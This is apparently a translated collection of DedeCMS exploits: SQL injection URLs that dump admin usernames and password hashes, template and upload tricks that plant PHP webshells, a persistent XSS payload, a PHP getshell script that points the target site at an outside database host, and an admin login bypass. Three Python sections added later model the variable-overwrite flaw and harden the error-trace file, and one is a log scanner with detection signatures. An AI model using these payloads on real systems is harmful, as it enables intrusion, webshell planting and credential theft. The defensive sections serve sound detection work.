Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a "software" item; in the local address field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php, a one-line webshell with password xiao.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit". Note that IE8/9 block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, visiting any of the URLs below triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "\nExploit Success \n";
if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n";
if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "\nNo response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value to enter the site backend directly.
This vulnerability requires knowing the backend path first.

Dedecms 织梦 tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert a row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then in attachment management replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit it; a "modified successfully" message means the template path has been changed. 3. Visit the modified article:
Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; to get the 16-character MD5 from that, remove 3 more characters from the front and 1 from the end.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

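The variable overwrite getshell script, the login.php backend bypass, the tag remote file write form and the select_soft_post.php form above all depend on one weakness: request fields named like _COOKIE[GLOBALS][cfg_dbhost], _POST[GLOBALS][cfg_dbuser] or cfg_basedir are imported into the script's variable scope, so a client can replace configuration. The Python model below is added here as an example; it is not DedeCMS code and not the exploit authors' code. It places a register_globals-style importer in its vulnerable form beside a hardened form that refuses reserved names. The reserved-name list and the cfg_ prefix rule are assumptions modelled on the general remedy for this bug class, not quoted from the DedeCMS source, and the configuration values are placeholders.

```python
import re
from typing import Any, Dict, List, Tuple

# Constructed configuration standing in for the cfg_* globals a DedeCMS
# install reads from its config files; the values are placeholders.
DEFAULT_CONFIG: Dict[str, Any] = {
    "cfg_dbhost": "localhost",
    "cfg_dbuser": "dede",
    "cfg_dbpwd": "placeholder",
    "cfg_basedir": "/var/www/dede",
    "cfg_imgtype": "jpg|gif|png",
}

# Names a client must never be able to supply. Assumption: the PHP
# superglobals, the GLOBALS alias, and every configuration key by prefix.
RESERVED = re.compile(
    r"^(GLOBALS|_GET|_POST|_COOKIE|_REQUEST|_SERVER|_FILES|_SESSION|_ENV|cfg_)",
    re.IGNORECASE,
)


class RequestVarNotAllowed(ValueError):
    """Raised by the hardened importer when a request key is reserved."""


def parse_php_name(name: str) -> List[str]:
    """Split a PHP-style field name into its bracket path:
    '_COOKIE[GLOBALS][cfg_dbhost]' -> ['_COOKIE', 'GLOBALS', 'cfg_dbhost']."""
    base, sep, rest = name.partition("[")
    path = [base]
    if sep:
        path += re.findall(r"\[([^\]]*)\]", sep + rest)
    return path


def register_globals_vulnerable(config: Dict[str, Any],
                                request: Dict[str, str]) -> Dict[str, Any]:
    """register_globals-style import: every request key becomes a variable
    in scope, and a GLOBALS[...] path writes straight into configuration.
    This is the behaviour the requests on this page rely on."""
    scope = dict(config)
    for name, value in request.items():
        path = parse_php_name(name)
        if "GLOBALS" in path:
            i = path.index("GLOBALS")
            if i + 1 < len(path):
                scope[path[i + 1]] = value      # cfg_dbhost := client value
        else:
            scope[path[0]] = value              # cfg_basedir := client value
    return scope


def register_globals_hardened(config: Dict[str, Any],
                              request: Dict[str, str]) -> Tuple[Dict[str, Any], Dict[str, str]]:
    """Reject any request whose key path touches a reserved name, and keep
    user input in its own namespace so it can never shadow configuration."""
    user_vars: Dict[str, str] = {}
    for name, value in request.items():
        for part in parse_php_name(name):
            if RESERVED.match(part):
                raise RequestVarNotAllowed(f"Request var not allowed: {name}")
        user_vars[name] = value
    return dict(config), user_vars


def is_rejected(request: Dict[str, str]) -> bool:
    """True if the hardened importer refuses this request."""
    try:
        register_globals_hardened(DEFAULT_CONFIG, request)
    except RequestVarNotAllowed:
        return True
    return False


if __name__ == "__main__":
    # Constructed request mirroring the field names used on this page.
    attack = {"_COOKIE[GLOBALS][cfg_dbhost]": "203.0.113.5",
              "cfg_basedir": "../../", "doaction": "x"}
    print("vulnerable scope:", register_globals_vulnerable(DEFAULT_CONFIG, attack))
    print("hardened rejects:", is_rejected(attack))
```

The hardened importer fails closed: one reserved name anywhere in the bracket path rejects the whole request, and ordinary fields such as doaction or nocache are returned in a separate dictionary rather than merged into configuration.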
织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS recording database error messages in a PHP file whose header is not validated.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

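The digg_frame.php item above works because the database error trace is written into a file the web server executes, and the logged SQL is placed inside it unescaped: a "*/ ... ?>" sequence in the client-controlled value closes the comment and what follows runs as code. The Python example below is added here and is not DedeCMS code. The "<?php /* ... */ ?>" wrapper is an assumption reconstructed from the trace output quoted in step 2; the hardened writer shows the two controls that matter, neutralising comment and tag terminators in logged data and writing the trace as a non-executable file outside the web root. The sample error and SQL strings are constructed from the page's step-2 output.

```python
import os
import tempfile

# Constructed values mirroring the error the page quotes in step 2.
SAMPLE_ERR = "Illegal double '1024e1024' value found during parsing"
SAMPLE_SQL = ("Select goodpost,badpost,scores From `gxeduw_archives` "
              "where id=1024e1024 limit 0,1;")
# The tainted value from step 1: it closes the comment and opens code.
TAINTED_SQL = SAMPLE_SQL[:-1] + " */eval($_POST[x]);var_dump(3);?>"


def trace_entry_vulnerable(err: str, sql: str) -> str:
    """Assumed original layout: the entry is wrapped in a PHP block comment so
    that fetching the .php trace file 'does nothing'. Nothing in the logged
    data is escaped, so a '*/' inside it ends the comment early."""
    return f"<?php /* Error: {err}\nError sql: {sql} */ ?>\n"


def php_code_escapes_comment(entry: str) -> bool:
    """True if the entry contains text outside the intended comment, that is,
    anything between the first '*/' and the final one."""
    first = entry.find("*/")
    last = entry.rfind("*/")
    return first != -1 and first != last


def neutralise(value: str) -> str:
    """Break the token sequences that let logged data turn into PHP code."""
    return value.replace("*/", "* /").replace("<?", "< ?").replace("?>", "? >")


def trace_entry_hardened(err: str, sql: str) -> str:
    """Plain-text entry: no PHP wrapper at all, terminators neutralised."""
    return f"Error: {neutralise(err)}\nError sql: {neutralise(sql)}\n"


def write_trace(entry: str, log_dir: str) -> str:
    """Append to a .log file (never .php) under a directory the web server
    does not serve; returns the path so the caller can verify placement."""
    path = os.path.join(log_dir, "mysql_error_trace.log")
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(entry)
    return path


if __name__ == "__main__":
    print("vulnerable entry breaks out:",
          php_code_escapes_comment(trace_entry_vulnerable(SAMPLE_ERR, TAINTED_SQL)))
    log_dir = tempfile.mkdtemp()
    print("hardened entry written to:",
          write_trace(trace_entry_hardened(SAMPLE_ERR, TAINTED_SQL), log_dir))
```

Escaping alone is not enough: a trace file with a .php extension under the document root stays one parser quirk away from execution, which is why the hardened writer changes both the content and the location.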
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
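For anyone operating or monitoring a DedeCMS site, the request shapes catalogued on this page are easy to spot in access logs. The scanner below is an added example, not anything from the page's authors. It checks constructed Apache combined-format log lines against signatures distilled from the URLs above: variable overwrite keys, the advancedsearch.php sql parameter, script tags in gotopage, path traversal in edit_face.php's oldface and carbuyaction.php's code parameter, UNION SELECT or updatexml() in the rss.php, feedback_js.php, infosearch.php and member/index.php parameters, and any fetch of data/mysql_error_trace.php. The log format, the signature names and all log lines and IP addresses are constructed for the example.

```python
import re
from typing import List, Tuple
from urllib.parse import urlsplit, unquote

# (name, path regex, query regex). Query regexes run on the percent-decoded
# query string; an empty query regex means the path alone is the signal.
SIGNATURES = [
    ("variable-overwrite", r".",
     r"(?:_COOKIE|_POST|_GET|_REQUEST)\[GLOBALS\]|(?:^|&)cfg_\w+="),
    ("advancedsearch-raw-sql", r"/plus/advancedsearch\.php$",
     r"(?:^|&)sql=\s*select\b"),
    ("gotopage-xss", r"/dede/login\.php$", r"gotopage=[^&]*<script"),
    ("edit_face-delete-traversal", r"/member/edit_face\.php$",
     r"dopost=delold&oldface=[^&]*\.\./"),
    ("carbuyaction-lfi", r"/plus/carbuyaction\.php$", r"code=[^&]*\.\./"),
    ("sqli-union-or-updatexml",
     r"/plus/(?:feedback_js|infosearch|rss)\.php$|/member/index\.php$",
     r"union\s+select|updatexml\s*\("),
    ("mysql_error_trace-fetch", r"/data/mysql_error_trace\.php$", ""),
]

# Apache combined format, assumed for the sample lines below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target: str) -> List[str]:
    """Return the names of every signature matching one request target."""
    parts = urlsplit(target)
    # Decode twice so %2527-style double encoding does not hide a quote.
    query = unquote(unquote(parts.query))
    hits = []
    for name, path_re, query_re in SIGNATURES:
        if re.search(path_re, parts.path, re.I) and (
                query_re == "" or re.search(query_re, query, re.I)):
            hits.append(name)
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Parse log lines and return (ip, target, hits) for each request that
    matches at least one signature; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            findings.append((m["ip"], m["target"], hits))
    return findings


# Constructed sample log; source and target IPs are documentation addresses.
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Jan/2011:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 512',
    '198.51.100.11 - - [10/Jan/2011:10:00:02 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 2048',
    '198.51.100.12 - - [10/Jan/2011:10:00:03 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 90',
    '198.51.100.13 - - [10/Jan/2011:10:00:04 +0800] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.5 HTTP/1.1" 200 12',
    '198.51.100.14 - - [10/Jan/2011:10:00:05 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3000',
    '198.51.100.15 - - [10/Jan/2011:10:00:06 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 0',
    '198.51.100.16 - - [10/Jan/2011:10:00:07 +0800] "GET /plus/rss.php?tid=1 HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits), target)
```

The variable overwrite signature is path-agnostic on purpose: the key names are the constant, the script they are sent to varies across the items on this page. Request bodies are not in access logs, so for the POST variants the same regex should also be run over a WAF or reverse-proxy body log where one exists.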